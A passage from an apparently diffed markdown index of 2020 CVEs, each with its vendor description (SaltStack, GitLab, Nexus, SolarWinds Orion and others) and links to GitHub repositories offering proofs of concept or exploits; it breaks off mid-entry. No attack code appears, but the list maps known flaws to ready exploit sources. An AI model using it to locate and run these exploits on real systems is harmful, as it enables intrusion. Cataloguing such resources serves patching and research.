[shubham0d/Zoom-dll-hijacking](https://github.com/shubham0d/Zoom-dll-hijacking) + +### CVE-2020-9802 (2020-06-09) + +A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution. + + +- [khcujw/CVE-2020-9802](https://github.com/khcujw/CVE-2020-9802) + +### CVE-2020-9922 (2020-12-08) + +A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra. Processing a maliciously crafted email may lead to writing arbitrary files. + + +- [Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922](https://github.com/Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922) + +### CVE-2020-9934 (2020-10-16) + +An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A local user may be able to view sensitive user information. + + +- [mattshockl/CVE-2020-9934](https://github.com/mattshockl/CVE-2020-9934) + +### CVE-2020-9992 (2020-10-16) + +This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network. + + +- [c0ntextomy/c0ntextomy](https://github.com/c0ntextomy/c0ntextomy) + +### CVE-2020-10128 (2023-09-05) + +SearchBlox product with version before 9.2.1 is vulnerable to stored cross-site scripting at multiple user input parameters. In SearchBlox products multiple parameters are not sanitized/validate properly which allows an attacker to inject malicious JavaScript. + + +- [InfoSec4Fun/CVE-2020-10128](https://github.com/InfoSec4Fun/CVE-2020-10128) + +### CVE-2020-10129 (2023-09-06) + +SearchBlox before Version 9.2.1 is vulnerable to Privileged Escalation-Lower user is able to access Admin functionality. + + +- [InfoSec4Fun/CVE-2020-10129](https://github.com/InfoSec4Fun/CVE-2020-10129) + +### CVE-2020-10130 (2023-09-06) + +SearchBlox before Version 9.1 is vulnerable to business logic bypass where the user is able to create multiple super admin users in the system. + + +- [InfoSec4Fun/CVE-2020-10130](https://github.com/InfoSec4Fun/CVE-2020-10130) + +### CVE-2020-10131 (2023-09-06) + +SearchBlox before Version 9.2.1 is vulnerable to CSV macro injection in "Featured Results" parameter. + + +- [InfoSec4Fun/CVE-2020-10131](https://github.com/InfoSec4Fun/CVE-2020-10131) + +### CVE-2020-10132 (2023-09-06) + +SearchBlox before Version 9.1 is vulnerable to cross-origin resource sharing misconfiguration. + + +- [InfoSec4Fun/CVE-2020-10132](https://github.com/InfoSec4Fun/CVE-2020-10132) + +### CVE-2020-10135 (2020-05-19) + +Legacy pairing and secure-connections pairing authentication in Bluetooth BR/EDR Core Specification v5.2 and earlier may allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. An unauthenticated, adjacent attacker could impersonate a Bluetooth BR/EDR master or slave to pair with a previously paired remote device to successfully complete the authentication procedure without knowing the link key. + + +- [m4rm0k/CVE-2020-10135-BIAS](https://github.com/m4rm0k/CVE-2020-10135-BIAS) + +### CVE-2020-10148 (2020-12-29) + +The SolarWinds Orion API is vulnerable to an authentication bypass that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected. + + +- [rdoix/CVE-2020-10148-Solarwinds-Orion](https://github.com/rdoix/CVE-2020-10148-Solarwinds-Orion) +- [B1anda0/CVE-2020-10148](https://github.com/B1anda0/CVE-2020-10148) + +### CVE-2020-10189 (2020-03-06) + +Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets. + + +- [zavke/CVE-2020-10189-ManageEngine](https://github.com/zavke/CVE-2020-10189-ManageEngine) + +### CVE-2020-10199 (2020-04-01) + +Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2). + + +- [wsfengfan/CVE-2020-10199-10204](https://github.com/wsfengfan/CVE-2020-10199-10204) +- [jas502n/CVE-2020-10199](https://github.com/jas502n/CVE-2020-10199) +- [magicming200/CVE-2020-10199_CVE-2020-10204](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204) +- [zhzyker/CVE-2020-10199_POC-EXP](https://github.com/zhzyker/CVE-2020-10199_POC-EXP) +- [aleenzz/CVE-2020-10199](https://github.com/aleenzz/CVE-2020-10199) +- [hugosg97/CVE-2020-10199-Nexus-3.21.01](https://github.com/hugosg97/CVE-2020-10199-Nexus-3.21.01) + +### CVE-2020-10204 (2020-04-01) + +Sonatype Nexus Repository before 3.21.2 allows Remote Code Execution. + + +- [zhzyker/CVE-2020-10204](https://github.com/zhzyker/CVE-2020-10204) + +### CVE-2020-10238 (2020-03-16) + +An issue was discovered in Joomla! before 3.9.16. Various actions in com_templates lack the required ACL checks, leading to various potential attack vectors. + + +- [HoangKien1020/CVE-2020-10238](https://github.com/HoangKien1020/CVE-2020-10238) + +### CVE-2020-10239 (2020-03-16) + +An issue was discovered in Joomla! before 3.9.16. Incorrect Access Control in the SQL fieldtype of com_fields allows access for non-superadmin users. + + +- [HoangKien1020/CVE-2020-10239](https://github.com/HoangKien1020/CVE-2020-10239) + +### CVE-2020-10551 (2020-04-09) + +QQBrowser before 10.5.3870.400 installs a Windows service TsService.exe. This file is writable by anyone belonging to the NT AUTHORITY\Authenticated Users group, which includes all local and remote users. This can be abused by local attackers to escalate privileges to NT AUTHORITY\SYSTEM by writing a malicious executable to the location of TsService. + + +- [seqred-s-a/CVE-2020-10551](https://github.com/seqred-s-a/CVE-2020-10551) + +### CVE-2020-10558 (2020-03-20) + +The driving interface of Tesla Model 3 vehicles in any release before 2020.4.10 allows Denial of Service to occur due to improper process separation, which allows attackers to disable the speedometer, web browser, climate controls, turn signal visual and sounds, navigation, autopilot notifications, along with other miscellaneous functions from the main screen. + + +- [nullze/CVE-2020-10558](https://github.com/nullze/CVE-2020-10558) +- [AmazingOut/Tesla-CVE-2020-10558](https://github.com/AmazingOut/Tesla-CVE-2020-10558) + +### CVE-2020-10560 (2020-03-30) + +An issue was discovered in Open Source Social Network (OSSN) through 5.3. A user-controlled file path with a weak cryptographic rand() can be used to read any file with the permissions of the webserver. This can lead to further compromise. The attacker must conduct a brute-force attack against the SiteKey to insert into a crafted URL for components/OssnComments/ossn_com.php and/or libraries/ossn.lib.upgrade.php. + + +- [alex-seymour/CVE-2020-10560-Key-Recovery](https://github.com/alex-seymour/CVE-2020-10560-Key-Recovery) +- [kevthehermit/CVE-2020-10560](https://github.com/kevthehermit/CVE-2020-10560) + +### CVE-2020-10596 (2020-03-17) + +OpenCart 3.0.3.2 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section. + + +- [miguelc49/CVE-2020-10596-2](https://github.com/miguelc49/CVE-2020-10596-2) +- [miguelc49/CVE-2020-10596-1](https://github.com/miguelc49/CVE-2020-10596-1) + +### CVE-2020-10663 (2020-04-28) + +The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent. + + +- [rails-lts/json_cve_2020_10663](https://github.com/rails-lts/json_cve_2020_10663) + +### CVE-2020-10665 (2020-03-18) + +Docker Desktop allows local privilege escalation to NT AUTHORITY\SYSTEM because it mishandles the collection of diagnostics with Administrator privileges, leading to arbitrary DACL permissions overwrites and arbitrary file writes. This affects Docker Desktop Enterprise before 2.1.0.9, Docker Desktop for Windows Stable before 2.2.0.4, and Docker Desktop for Windows Edge before 2.2.2.0. + + +- [spaceraccoon/CVE-2020-10665](https://github.com/spaceraccoon/CVE-2020-10665) + +### CVE-2020-10673 (2020-03-18) + +FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus). + + +- [harry1080/CVE-2020-10673](https://github.com/harry1080/CVE-2020-10673) +- [Al1ex/CVE-2020-10673](https://github.com/Al1ex/CVE-2020-10673) + +### CVE-2020-10713 (2020-07-30) + +A flaw was found in grub2, prior to version 2.06. An attacker may use the GRUB 2 flaw to hijack and tamper the GRUB verification process. This flaw also allows the bypass of Secure Boot protections. In order to load an untrusted or modified kernel, an attacker would first need to establish access to the system such as gaining physical access, obtain the ability to alter a pxe-boot network, or have remote access to a networked system with root access. With this access, an attacker could then craft a string to cause a buffer overflow by injecting a malicious payload that leads to arbitrary code execution within GRUB. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. + + +- [eclypsium/BootHole](https://github.com/eclypsium/BootHole) + +### CVE-2020-10749 (2020-06-03) + +A vulnerability was found in all versions of containernetworking/plugins before version 0.8.6, that allows malicious containers in Kubernetes clusters to perform man-in-the-middle (MitM) attacks. A malicious container can exploit this flaw by sending rogue IPv6 router advertisements to the host or other containers, to redirect traffic to the malicious container. + + +- [knqyf263/CVE-2020-10749](https://github.com/knqyf263/CVE-2020-10749) + +### CVE-2020-10757 (2020-06-09) + +A flaw was found in the Linux Kernel in versions after 4.5-rc1 in the way mremap handled DAX Huge Pages. This flaw allows a local attacker with access to a DAX enabled storage to escalate their privileges on the system. + + +- [ShaikUsaf/linux-4.19.72_CVE-2020-10757](https://github.com/ShaikUsaf/linux-4.19.72_CVE-2020-10757) + +### CVE-2020-10759 (2020-09-15) + +A PGP signature bypass flaw was found in fwupd (all versions), which could lead to the installation of unsigned firmware. As per upstream, a signature bypass is theoretically possible, but not practical because the Linux Vendor Firmware Service (LVFS) is either not implemented or enabled in versions of fwupd shipped with Red Hat Enterprise Linux 7 and 8. The highest threat from this vulnerability is to confidentiality and integrity. + + +- [justinsteven/CVE-2020-10759-poc](https://github.com/justinsteven/CVE-2020-10759-poc) + +### CVE-2020-10770 (2020-12-15) + +A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack. + + +- [ColdFusionX/Keycloak-12.0.1-CVE-2020-10770](https://github.com/ColdFusionX/Keycloak-12.0.1-CVE-2020-10770) + +### CVE-2020-10882 (2020-03-25) + +This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the tdpServer service, which listens on UDP port 20002 by default. When parsing the slave_mac parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the root user. Was ZDI-CAN-9650. + + +- [lnversed/CVE-2020-10882](https://github.com/lnversed/CVE-2020-10882) + +### CVE-2020-10915 (2020-04-22) + +This vulnerability allows remote attackers to execute arbitrary code on affected installations of VEEAM One Agent 9.5.4.4587. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HandshakeResult method. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-10401. + + +- [Cinnamon1212/Modified-CVE-2020-10915-MsfModule](https://github.com/Cinnamon1212/Modified-CVE-2020-10915-MsfModule) + +### CVE-2020-10963 (2020-03-25) + +FrozenNode Laravel-Administrator through 5.0.12 allows unrestricted file upload (and consequently Remote Code Execution) via admin/tips_image/image/file_upload image upload with PHP content within a GIF image that has the .php extension. NOTE: this product is discontinued. + + +- [scopion/CVE-2020-10963](https://github.com/scopion/CVE-2020-10963) + +### CVE-2020-10977 (2020-04-08) + +GitLab EE/CE 8.5 to 12.9 is vulnerable to a an path traversal when moving an issue between projects. + + +- [KooroshRZ/CVE-2020-10977](https://github.com/KooroshRZ/CVE-2020-10977) +- [thewhiteh4t/cve-2020-10977](https://github.com/thewhiteh4t/cve-2020-10977) +- [JustMichi/CVE-2020-10977.py](https://github.com/JustMichi/CVE-2020-10977.py) +- [erk3/gitlab-12.9.0-file-read](https://github.com/erk3/gitlab-12.9.0-file-read) +- [possib1e/cve-2020-10977](https://github.com/possib1e/cve-2020-10977) +- [liath/CVE-2020-10977](https://github.com/liath/CVE-2020-10977) +- [lisp3r/cve-2020-10977-read-and-execute](https://github.com/lisp3r/cve-2020-10977-read-and-execute) +- [vandycknick/gitlab-cve-2020-10977](https://github.com/vandycknick/gitlab-cve-2020-10977) + +### CVE-2020-11019 (2020-05-29) + +In FreeRDP less than or equal to 2.0.0, when running with logger set to "WLOG_TRACE", a possible crash of application could occur due to a read of an invalid array index. Data could be printed as string to local terminal. This has been fixed in 2.1.0. + + +- [Lixterclarixe/CVE-2020-11019](https://github.com/Lixterclarixe/CVE-2020-11019) + +### CVE-2020-11022 (2020-04-29) + +In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. + + +- [0xAJ2K/CVE-2020-11022-CVE-2020-11023](https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023) +- [Snorlyd/https-nj.gov---CVE-2020-11022](https://github.com/Snorlyd/https-nj.gov---CVE-2020-11022) + +### CVE-2020-11023 (2020-04-29) + +In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. + + +- [Snorlyd/https-nj.gov---CVE-2020-11023](https://github.com/Snorlyd/https-nj.gov---CVE-2020-11023) +- [Cybernegro/CVE-2020-11023](https://github.com/Cybernegro/CVE-2020-11023) +- [andreassundstrom/cve-2020-11023-demonstration](https://github.com/andreassundstrom/cve-2020-11023-demonstration) + +### CVE-2020-11060 (2020-05-12) + +In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an attacker without a valid account by using a CSRF. Due to the difficulty of the exploitation, the attack is only conceivable by an account having Maintenance privileges and the right to add WIFI networks. This is fixed in version 9.4.6. + + +- [0xdreadnaught/cve-2020-11060-poc](https://github.com/0xdreadnaught/cve-2020-11060-poc) + +### CVE-2020-11076 (2020-05-22) + +In Puma (RubyGem) before 4.3.4 and 3.12.5, an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header. The problem has been fixed in Puma 3.12.5 and Puma 4.3.4. + + +- [dentarg/cougar](https://github.com/dentarg/cougar) + +### CVE-2020-11107 (2020-04-02) + +An issue was discovered in XAMPP before 7.2.29, 7.3.x before 7.3.16 , and 7.4.x before 7.4.4 on Windows. An unprivileged user can change a .exe configuration in xampp-contol.ini for all users (including admins) to enable arbitrary command execution. + + +- [S1lkys/CVE-2020-11107](https://github.com/S1lkys/CVE-2020-11107) +- [andripwn/CVE-2020-11107](https://github.com/andripwn/CVE-2020-11107) + +### CVE-2020-11108 (2020-05-11) + +The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing to a PHP file in the web directory. (Also, it can be used in conjunction with the sudo rule for the www-data user to escalate privileges to root.) The code error is in gravity_DownloadBlocklistFromUrl in gravity.sh. + + +- [Frichetten/CVE-2020-11108-PoC](https://github.com/Frichetten/CVE-2020-11108-PoC) + +### CVE-2020-11110 (2020-07-27) + +Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. + + +- [AVE-Stoik/CVE-2020-11110-Proof-of-Concept](https://github.com/AVE-Stoik/CVE-2020-11110-Proof-of-Concept) + +### CVE-2020-11113 (2020-03-31) + +FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa). + + +- [Al1ex/CVE-2020-11113](https://github.com/Al1ex/CVE-2020-11113) + +### CVE-2020-11179 (2021-01-21) + +Arbitrary read and write to kernel addresses by temporarily overwriting ring buffer pointer and creating a race condition. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables + + +- [sparrow-labz/CVE-2020-11179-Adreno-Qualcomm-GPU](https://github.com/sparrow-labz/CVE-2020-11179-Adreno-Qualcomm-GPU) + +### CVE-2020-11444 (2020-04-02) + +Sonatype Nexus Repository Manager 3.x up to and including 3.21.2 has Incorrect Access Control. + + +- [zhzyker/CVE-2020-11444](https://github.com/zhzyker/CVE-2020-11444) +- [CN016/Nexus-Repository-Manager-3-CVE-2020-11444-](https://github.com/CN016/Nexus-Repository-Manager-3-CVE-2020-11444-) + +### CVE-2020-11492 (2020-06-05) + +An issue was discovered in Docker Desktop through 2.2.0.5 on Windows. If a local attacker sets up their own named pipe prior to starting Docker with the same name, this attacker can intercept a connection attempt from Docker Service (which runs as SYSTEM), and then impersonate their privileges. + + +- [CrackerCat/CVE-2020-11492](https://github.com/CrackerCat/CVE-2020-11492) + +### CVE-2020-11493 (2020-09-04) + +In Foxit Reader and PhantomPDF before 10.0.1, and PhantomPDF before 9.7.3, attackers can obtain sensitive information about an uninitialized object because of direct transformation from PDF Object to Stream without concern for a crafted XObject. + + +- [fengjixuchui/CVE-2020-11493](https://github.com/fengjixuchui/CVE-2020-11493) + +### CVE-2020-11519 (2020-06-22) + +The SDDisk2k.sys driver of WinMagic SecureDoc v8.5 and earlier allows local users to read or write to physical disc sectors via a \\.\SecureDocDevice handle. Exploiting this vulnerability results in privileged code execution. + + +- [patois/winmagic_sd](https://github.com/patois/winmagic_sd) + +### CVE-2020-11539 (2020-04-22) + +An issue was discovered on Tata Sonata Smart SF Rush 1.12 devices. It has been identified that the smart band has no pairing (mode 0 Bluetooth LE security level) The data being transmitted over the air is not encrypted. Adding to this, the data being sent to the smart band doesn't have any authentication or signature verification. Thus, any attacker can control a parameter of the device. + + +- [the-girl-who-lived/CVE-2020-11539](https://github.com/the-girl-who-lived/CVE-2020-11539) + +### CVE-2020-11546 (2020-07-14) + +SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection. + + +- [Official-BlackHat13/CVE-2020-11546](https://github.com/Official-BlackHat13/CVE-2020-11546) +- [damit5/CVE-2020-11546](https://github.com/damit5/CVE-2020-11546) + +### CVE-2020-11547 (2020-04-04) + +PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself (CPU usage, memory, Windows version, and internal statistics) via an HTTP request, as demonstrated by type=probes to login.htm or index.htm. + + +- [ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure](https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure) + +### CVE-2020-11579 (2020-09-03) + +An issue was discovered in Chadha PHPKB 9.0 Enterprise Edition. installer/test-connection.php (part of the installation process) allows a remote unauthenticated attacker to disclose local files on hosts running PHP before 7.2.16, or on hosts where the MySQL ALLOW LOCAL DATA INFILE option is enabled. + + +- [ShielderSec/CVE-2020-11579](https://github.com/ShielderSec/CVE-2020-11579) + +### CVE-2020-11650 (2020-04-08) + +An issue was discovered in iXsystems FreeNAS (and TrueNAS) 11.2 before 11.2-u8 and 11.3 before 11.3-U1. It allows a denial of service. The login authentication component has no limits on the length of an authentication message or the rate at which such messages are sent. + + +- [weinull/CVE-2020-11650](https://github.com/weinull/CVE-2020-11650) + +### CVE-2020-11651 (2020-04-30) + +An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. + + +- [chef-cft/salt-vulnerabilities](https://github.com/chef-cft/salt-vulnerabilities) +- [rossengeorgiev/salt-security-backports](https://github.com/rossengeorgiev/salt-security-backports) +- [dozernz/cve-2020-11651](https://github.com/dozernz/cve-2020-11651) +- [0xc0d/CVE-2020-11651](https://github.com/0xc0d/CVE-2020-11651) +- [jasperla/CVE-2020-11651-poc](https://github.com/jasperla/CVE-2020-11651-poc) +- [bravery9/SaltStack-Exp](https://github.com/bravery9/SaltStack-Exp) +- [kevthehermit/CVE-2020-11651](https://github.com/kevthehermit/CVE-2020-11651) +- [lovelyjuice/cve-2020-11651-exp-plus](https://github.com/lovelyjuice/cve-2020-11651-exp-plus) +- [ssrsec/CVE-2020-11651-CVE-2020-11652-EXP](https://github.com/ssrsec/CVE-2020-11651-CVE-2020-11652-EXP) +- [RakhithJK/CVE-2020-11651](https://github.com/RakhithJK/CVE-2020-11651) +- [appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652](https://github.com/appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652) +- [hardsoftsecurity/CVE-2020-11651-PoC](https://github.com/hardsoftsecurity/CVE-2020-11651-PoC) + +### CVE-2020-11652 (2020-04-30) + +An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. + + +- [fanjq99/CVE-2020-11652](https://github.com/fanjq99/CVE-2020-11652) +- [Al1ex/CVE-2020-11652](https://github.com/Al1ex/CVE-2020-11652) +- [limon768/CVE-2020-11652-POC](https://github.com/limon768/CVE-2020-11652-POC) + +### CVE-2020-11738 (2020-04-13) + +The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init. + + +- [raghu66669999/wordpress-snapcreek](https://github.com/raghu66669999/wordpress-snapcreek) + +### CVE-2020-11794 +- [w4cky/CVE-2020-11794](https://github.com/w4cky/CVE-2020-11794) + +### CVE-2020-11819 (2020-04-16) + +In Rukovoditel 2.5.2, an attacker may inject an arbitrary .php file location instead of a language file and thus achieve command execution. + + +- [danyx07/PoC-RCE-Rukovoditel](https://github.com/danyx07/PoC-RCE-Rukovoditel) + +### CVE-2020-11851 (2020-11-17) + +Arbitrary code execution vulnerability on Micro Focus ArcSight Logger product, affecting all version prior to 7.1.1. The vulnerability could be remotely exploited resulting in the execution of arbitrary code. + + +- [ch1nghz/CVE-2020-11851](https://github.com/ch1nghz/CVE-2020-11851) + +### CVE-2020-11881 (2020-09-14) + +An array index error in MikroTik RouterOS 6.41.3 through 6.46.5, and 7.x through 7.0 Beta5, allows an unauthenticated remote attacker to crash the SMB server via modified setup-request packets, aka SUP-12964. + + +- [botlabsDev/CVE-2020-11881](https://github.com/botlabsDev/CVE-2020-11881) + +### CVE-2020-11883 (2020-04-17) + +In Divante vue-storefront-api through 1.11.1 and storefront-api through 1.0-rc.1, as used in VueStorefront PWA, unexpected HTTP requests lead to an exception that discloses the error stack trace, with absolute file paths and Node.js module names. + + +- [0ndras3k/CVE-2020-11883](https://github.com/0ndras3k/CVE-2020-11883) + +### CVE-2020-11890 (2020-04-21) + +An issue was discovered in Joomla! before 3.9.17. Improper input validations in the usergroup table class could lead to a broken ACL configuration. + + +- [HoangKien1020/CVE-2020-11890](https://github.com/HoangKien1020/CVE-2020-11890) + +### CVE-2020-11896 (2020-06-17) + +The Treck TCP/IP stack before 6.0.1.66 allows Remote Code Execution, related to IPv4 tunneling. + + +- [Fans0n-Fan/Treck20-Related](https://github.com/Fans0n-Fan/Treck20-Related) +- [0xkol/ripple20-digi-connect-exploit](https://github.com/0xkol/ripple20-digi-connect-exploit) + +### CVE-2020-11898 (2020-06-17) + +The Treck TCP/IP stack before 6.0.1.66 improperly handles an IPv4/ICMPv4 Length Parameter Inconsistency, which might allow remote attackers to trigger an information leak. + + +- [scamwork/POC_CVE-2020-11898](https://github.com/scamwork/POC_CVE-2020-11898) + +### CVE-2020-11932 (2020-05-13) + +It was discovered that the Subiquity installer for Ubuntu Server logged the LUKS full disk encryption password if one was entered. + + +- [ProjectorBUg/CVE-2020-11932](https://github.com/ProjectorBUg/CVE-2020-11932) +- [Staubgeborener/CVE-2020-11932](https://github.com/Staubgeborener/CVE-2020-11932) +- [code-developers/CVE-2020-11932](https://github.com/code-developers/CVE-2020-11932) + +### CVE-2020-11975 (2020-06-05) + +Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process. + + +- [1135/unomi_exploit](https://github.com/1135/unomi_exploit) + +### CVE-2020-11978 (2020-07-16) + +An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. + + +- [pberba/CVE-2020-11978](https://github.com/pberba/CVE-2020-11978) + +### CVE-2020-11989 (2020-06-22) + +Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass. + + +- [HYWZ36/HYWZ36-CVE-2020-11989-code](https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code) + +### CVE-2020-11990 (2020-12-01) + +We have resolved a security issue in the camera plugin that could have affected certain Cordova (Android) applications. An attacker who could install (or lead the victim to install) a specially crafted (or malicious) Android application would be able to access pictures taken with the app externally. + + +- [forse01/CVE-2020-11990-Cordova](https://github.com/forse01/CVE-2020-11990-Cordova) + +### CVE-2020-11996 (2020-06-26) + +A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive. + + +- [rusakovichma/tomcat-embed-core-9.0.31-CVE-2020-11996](https://github.com/rusakovichma/tomcat-embed-core-9.0.31-CVE-2020-11996) + +### CVE-2020-12077 (2020-04-23) + +The mappress-google-maps-for-wordpress plugin before 2.53.9 for WordPress does not correctly implement AJAX functions with nonces (or capability checks), leading to remote code execution. + + +- [RandomRobbieBF/CVE-2020-12077](https://github.com/RandomRobbieBF/CVE-2020-12077) + +### CVE-2020-12078 (2020-04-28) + +An issue was discovered in Open-AudIT 3.3.1. There is shell metacharacter injection via attributes to an open-audit/configuration/ URI. An attacker can exploit this by adding an excluded IP address to the global discovery settings (internally called exclude_ip). This exclude_ip value is passed to the exec function in the discoveries_helper.php file (inside the all_ip_list function) without being filtered, which means that the attacker can provide a payload instead of a valid IP address. + + +- [mhaskar/CVE-2020-12078](https://github.com/mhaskar/CVE-2020-12078) +- [84KaliPleXon3/CVE-2020-12078](https://github.com/84KaliPleXon3/CVE-2020-12078) + +### CVE-2020-12112 (2020-04-23) + +BigBlueButton before 2.2.5 allows remote attackers to obtain sensitive files via Local File Inclusion. + + +- [tchenu/CVE-2020-12112](https://github.com/tchenu/CVE-2020-12112) + +### CVE-2020-12116 (2020-05-07) + +Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request. + + +- [BeetleChunks/CVE-2020-12116](https://github.com/BeetleChunks/CVE-2020-12116) + +### CVE-2020-12124 (2020-10-02) + +A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication. + + +- [db44k/CVE-2020-12124](https://github.com/db44k/CVE-2020-12124) +- [Scorpion-Security-Labs/CVE-2020-12124](https://github.com/Scorpion-Security-Labs/CVE-2020-12124) + +### CVE-2020-12255 (2020-05-18) + +rConfig 3.9.4 is vulnerable to remote code execution due to improper validation in the file upload functionality. vendor.crud.php accepts a file upload by checking content-type without considering the file extension and header. Thus, an attacker can exploit this by uploading a .php file to vendor.php that contains arbitrary PHP code and changing the content-type to image/gif. + + +- [vishwaraj101/CVE-2020-12255](https://github.com/vishwaraj101/CVE-2020-12255) + +### CVE-2020-12351 (2020-11-23) + +Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access. + + +- [naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP](https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP) + +### CVE-2020-12432 (2020-07-21) + +The WOPI API integration for Vereign Collabora CODE through 4.2.2 does not properly restrict delivery of JavaScript to a victim's browser, and lacks proper MIME type access control, which could lead to XSS that steals account credentials via cookies or local storage. The attacker must first obtain an API access token, which can be accomplished if the attacker is able to upload a .docx or .odt file. The associated API endpoints for exploitation are /wopi/files and /wopi/getAccessToken. + + +- [d7x/CVE-2020-12432](https://github.com/d7x/CVE-2020-12432) + +### CVE-2020-12593 (2020-11-18) + +Symantec Endpoint Detection & Response, prior to 4.5, may be susceptible to an information disclosure issue, which is a type of vulnerability that could potentially allow unauthorized access to data. + + +- [nasbench/CVE-2020-12593](https://github.com/nasbench/CVE-2020-12593) + +### CVE-2020-12625 (2020-05-04) + +An issue was discovered in Roundcube Webmail before 1.4.4. There is a cross-site scripting (XSS) vulnerability in rcube_washtml.php because JavaScript code can occur in the CDATA of an HTML message. + + +- 